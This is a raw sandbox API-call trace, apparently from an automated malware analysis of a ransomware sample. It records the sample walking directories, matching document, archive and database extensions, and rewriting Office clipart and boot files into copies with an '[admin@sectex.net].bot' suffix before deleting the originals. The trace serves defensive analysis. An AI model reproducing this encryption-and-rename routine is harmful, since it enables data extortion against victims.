	[0059.244] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0059.244] lstrlenW (lpString=".xls") returned 4
	[0059.244] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0059.244] lstrlenW (lpString=".xlsx") returned 5
	[0059.244] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0059.244] lstrlenW (lpString=".ppt") returned 4
	[0059.244] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0059.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63
	[0059.244] lstrlenW (lpString=".zip") returned 4
	[0059.244] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0059.244] lstrlenW (lpString=".rar") returned 4
	[0059.244] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0059.244] lstrlenW (lpString=".bz2") returned 4
	[0059.244] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0059.244] lstrlenW (lpString=".7z") returned 3
	[0059.244] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0059.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63
	[0059.244] lstrlenW (lpString=".dbf") returned 4
	[0059.244] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0059.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63
	[0059.244] lstrlenW (lpString=".1cd") returned 4
	[0059.244] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0059.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04174_.WMF") returned 63
	[0059.244] lstrlenW (lpString=".jpg") returned 4
	[0059.244] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0059.244] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0059.244] lstrlenW (lpString="AN04191_.WMF") returned 12
	[0059.244] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c
	[0059.245] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=6636) returned 1
	[0059.245] CloseHandle (hObject=0x15c) returned 1
	[0059.245] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf")) returned 0x20
	[0059.245] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0059.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c
	[0059.245] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.245] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.245] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160
	[0059.245] GetLastError () returned 0x0
	[0059.245] ReadFile (in: hFile=0x15c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x19ec, lpOverlapped=0x0) returned 1
	[0059.384] WriteFile (in: hFile=0x160, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x19f0, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x19f0, lpOverlapped=0x0) returned 1
	[0059.385] ReadFile (in: hFile=0x15c, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0059.385] WriteFile (in: hFile=0x160, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0059.386] SetEndOfFile (hFile=0x160) returned 1
	[0059.386] CloseHandle (hObject=0x160) returned 1
	[0059.386] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0059.386] SetEndOfFile (hFile=0x15c) returned 1
	[0059.387] CloseHandle (hObject=0x15c) returned 1
	[0059.387] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0059.387] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04191_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04191_.wmf")) 

Thread:
	id = 13
	os_tid = 0x988

	[0032.815] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0xabb0888
	[0032.816] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10000) returned 0xabc0890
	[0032.816] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08ef8
	[0032.816] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x6) returned 0xabb02a0
	[0032.816] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08f10
	[0032.816] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x100000) returned 0xae90020
	[0032.816] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08f28
	[0032.817] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08f28, Size=0x20) returned 0x7df2f90
	[0032.817] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x10) returned 0x7e08f28
	[0032.817] RtlReAllocateHeap (Heap=0x7d60000, Flags=0x0, Ptr=0x7e08f28, Size=0x20) returned 0x7df2f68
	[0032.817] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000
	[0032.817] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650
	[0032.817] Wow64DisableWow64FsRedirection (in: OldValue=0xa2dff58 | out: OldValue=0xa2dff58*=0x0) returned 1
	[0032.817] lstrlenW (lpString="kernel32.dll") returned 12
	[0032.817] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f90 | out: hHeap=0x7d60000) returned 1
	[0032.817] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30
	[0032.817] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df2f68 | out: hHeap=0x7d60000) returned 1
	[0032.817] Sleep (dwMilliseconds=0x64) 
	[0033.038] lstrcmpiW (lpString1=".ttf", lpString2=".bot") returned 1
	[0033.038] lstrlenW (lpString="cht_boot.ttf") returned 12
	[0033.038] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.264] GetFileSizeEx (in: hFile=0x190, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=3876772) returned 1
	[0033.264] CloseHandle (hObject=0x190) returned 1
	[0033.264] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf")) returned 0x20
	[0033.264] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.264] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0033.264] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0033.264] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0033.264] lstrlenW (lpString=".doc") returned 4
	[0033.264] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0033.264] lstrlenW (lpString=".docx") returned 5
	[0033.264] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0033.264] lstrlenW (lpString=".pdf") returned 4
	[0033.264] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0033.264] lstrlenW (lpString=".xls") returned 4
	[0033.264] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0033.264] lstrlenW (lpString=".xlsx") returned 5
	[0033.264] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0033.264] lstrlenW (lpString=".ppt") returned 4
	[0033.265] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0033.265] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0033.265] lstrlenW (lpString=".zip") returned 4
	[0033.265] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0033.265] lstrlenW (lpString=".rar") returned 4
	[0033.265] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0033.265] lstrlenW (lpString=".bz2") returned 4
	[0033.265] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
	[0033.265] lstrlenW (lpString=".7z") returned 3
	[0033.265] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0033.265] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0033.265] lstrlenW (lpString=".dbf") returned 4
	[0033.265] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0033.265] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0033.265] lstrlenW (lpString=".1cd") returned 4
	[0033.265] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0033.265] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0033.265] lstrlenW (lpString=".jpg") returned 4
	[0033.265] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0033.265] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0033.265] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0033.265] lstrlenW (lpString=".doc") returned 4
	[0033.265] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0033.265] lstrlenW (lpString=".docx") returned 5
	[0033.265] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0033.265] lstrlenW (lpString=".pdf") returned 4
	[0033.265] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0033.265] lstrlenW (lpString=".xls") returned 4
	[0033.265] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0033.265] lstrlenW (lpString=".xlsx") returned 5
	[0033.265] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0033.265] lstrlenW (lpString=".ppt") returned 4
	[0033.265] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0033.266] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0033.266] lstrlenW (lpString=".zip") returned 4
	[0033.266] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0033.266] lstrlenW (lpString=".rar") returned 4
	[0033.266] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0033.266] lstrlenW (lpString=".bz2") returned 4
	[0033.266] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
	[0033.266] lstrlenW (lpString=".7z") returned 3
	[0033.266] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0033.266] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0033.266] lstrlenW (lpString=".dbf") returned 4
	[0033.266] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0033.266] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0033.266] lstrlenW (lpString=".1cd") returned 4
	[0033.266] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0033.266] lstrlenW (lpString="C:\\Boot\\Fonts\\cht_boot.ttf") returned 26
	[0033.266] lstrlenW (lpString=".jpg") returned 4
	[0033.266] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0033.266] lstrcmpiW (lpString1=".ttf", lpString2=".bot") returned 1
	[0033.266] lstrlenW (lpString="wgl4_boot.ttf") returned 13
	[0033.266] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.267] GetFileSizeEx (in: hFile=0x190, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=47452) returned 1
	[0033.267] CloseHandle (hObject=0x190) returned 1
	[0033.267] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20
	[0033.267] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.267] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0033.267] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27
	[0033.267] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27
	[0033.267] lstrlenW (lpString=".doc") returned 4
	[0033.267] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0033.267] lstrlenW (lpString=".docx") returned 5
	[0033.267] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0033.267] lstrlenW (lpString=".pdf") returned 4
	[0033.267] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0033.267] lstrlenW (lpString=".xls") returned 4
	[0033.267] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0033.267] lstrlenW (lpString=".xlsx") returned 5
	[0033.267] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0033.267] lstrlenW (lpString=".ppt") returned 4
	[0033.267] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0033.267] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27
	[0033.267] lstrlenW (lpString=".zip") returned 4
	[0033.267] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0033.267] lstrlenW (lpString=".rar") returned 4
	[0033.267] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0033.267] lstrlenW (lpString=".bz2") returned 4
	[0033.267] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
	[0033.267] lstrlenW (lpString=".7z") returned 3
	[0033.267] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0033.268] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27
	[0033.268] lstrlenW (lpString=".dbf") returned 4
	[0033.268] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0033.268] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27
	[0033.268] lstrlenW (lpString=".1cd") returned 4
	[0033.268] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0033.268] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27
	[0033.268] lstrlenW (lpString=".jpg") returned 4
	[0033.268] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0033.268] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27
	[0033.268] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27
	[0033.268] lstrlenW (lpString=".doc") returned 4
	[0033.268] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1
	[0033.268] lstrlenW (lpString=".docx") returned 5
	[0033.268] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1
	[0033.268] lstrlenW (lpString=".pdf") returned 4
	[0033.268] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1
	[0033.268] lstrlenW (lpString=".xls") returned 4
	[0033.268] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1
	[0033.268] lstrlenW (lpString=".xlsx") returned 5
	[0033.268] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1
	[0033.268] lstrlenW (lpString=".ppt") returned 4
	[0033.268] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1
	[0033.268] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27
	[0033.268] lstrlenW (lpString=".zip") returned 4
	[0033.268] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1
	[0033.268] lstrlenW (lpString=".rar") returned 4
	[0033.268] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1
	[0033.268] lstrlenW (lpString=".bz2") returned 4
	[0033.268] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1
	[0033.268] lstrlenW (lpString=".7z") returned 3
	[0033.268] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1
	[0033.268] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27
	[0033.268] lstrlenW (lpString=".dbf") returned 4
	[0033.269] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1
	[0033.269] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27
	[0033.269] lstrlenW (lpString=".1cd") returned 4
	[0033.269] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1
	[0033.269] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27
	[0033.269] lstrlenW (lpString=".jpg") returned 4
	[0033.269] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1
	[0033.269] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0033.269] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0033.269] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.269] GetFileSizeEx (in: hFile=0x190, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=93248) returned 1
	[0033.269] CloseHandle (hObject=0x190) returned 1
	[0033.269] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20
	[0033.269] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.269] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0033.269] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0033.269] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0033.270] lstrlenW (lpString=".doc") returned 4
	[0033.270] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0033.270] lstrlenW (lpString=".docx") returned 5
	[0033.270] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0033.270] lstrlenW (lpString=".pdf") returned 4
	[0033.270] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0033.270] lstrlenW (lpString=".xls") returned 4
	[0033.270] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0033.270] lstrlenW (lpString=".xlsx") returned 5
	[0033.270] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0033.270] lstrlenW (lpString=".ppt") returned 4
	[0033.270] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0033.270] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0033.270] lstrlenW (lpString=".zip") returned 4
	[0033.270] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0033.270] lstrlenW (lpString=".rar") returned 4
	[0033.270] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0033.270] lstrlenW (lpString=".bz2") returned 4
	[0033.270] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0033.270] lstrlenW (lpString=".7z") returned 3
	[0033.270] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0033.270] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0033.270] lstrlenW (lpString=".dbf") returned 4
	[0033.270] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0033.270] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0033.270] lstrlenW (lpString=".1cd") returned 4
	[0033.270] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0033.270] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0033.270] lstrlenW (lpString=".jpg") returned 4
	[0033.270] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0033.270] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0033.270] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0033.270] lstrlenW (lpString=".doc") returned 4
	[0033.270] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0033.271] lstrlenW (lpString=".docx") returned 5
	[0033.271] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0033.271] lstrlenW (lpString=".pdf") returned 4
	[0033.271] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0033.271] lstrlenW (lpString=".xls") returned 4
	[0033.271] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0033.271] lstrlenW (lpString=".xlsx") returned 5
	[0033.271] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0033.271] lstrlenW (lpString=".ppt") returned 4
	[0033.271] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0033.271] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0033.271] lstrlenW (lpString=".zip") returned 4
	[0033.271] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1
	[0033.271] lstrlenW (lpString=".rar") returned 4
	[0033.271] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1
	[0033.271] lstrlenW (lpString=".bz2") returned 4
	[0033.271] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1
	[0033.271] lstrlenW (lpString=".7z") returned 3
	[0033.271] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1
	[0033.271] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0033.271] lstrlenW (lpString=".dbf") returned 4
	[0033.271] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1
	[0033.271] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0033.271] lstrlenW (lpString=".1cd") returned 4
	[0033.271] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1
	[0033.271] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29
	[0033.271] lstrlenW (lpString=".jpg") returned 4
	[0033.271] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1
	[0033.271] lstrcmpiW (lpString1=".mui", lpString2=".bot") returned 1
	[0033.271] lstrlenW (lpString="bootmgr.exe.mui") returned 15
	[0033.271] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0033.272] GetFileSizeEx (in: hFile=0x190, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=90688) returned 1
	[0033.272] CloseHandle (hObject=0x190) returned 1
	[0033.272] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20
	[0033.272] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0033.272] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0033.272] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0033.272] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
	[0033.272] lstrlenW (lpString=".doc") returned 4
	[0033.272] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1
	[0033.272] lstrlenW (lpString=".docx") returned 5
	[0033.272] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1
	[0033.272] lstrlenW (lpString=".pdf") returned 4
	[0033.272] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1
	[0033.272] lstrlenW (lpString=".xls") returned 4
	[0033.272] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1
	[0033.272] lstrlenW (lpString=".xlsx") returned 5
	[0033.272] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1
	[0033.272] lstrlenW (lpString=".ppt") returned 4
	[0033.272] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1
	[0033.272] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29
